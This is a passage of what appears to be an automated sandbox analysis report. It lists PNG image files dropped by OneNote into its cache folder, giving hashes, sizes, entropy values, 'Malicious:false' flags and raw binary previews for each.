                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000G.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3879
                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000H.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19235
                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000I.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7374
                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000J.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000K.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5386
                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000M.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000N.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14553
                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000O.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8184
                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000P.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1924
                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000Q.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11886
                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000R.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2270
                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000S.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16003
                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000T.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13241
                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                  Malicious:false
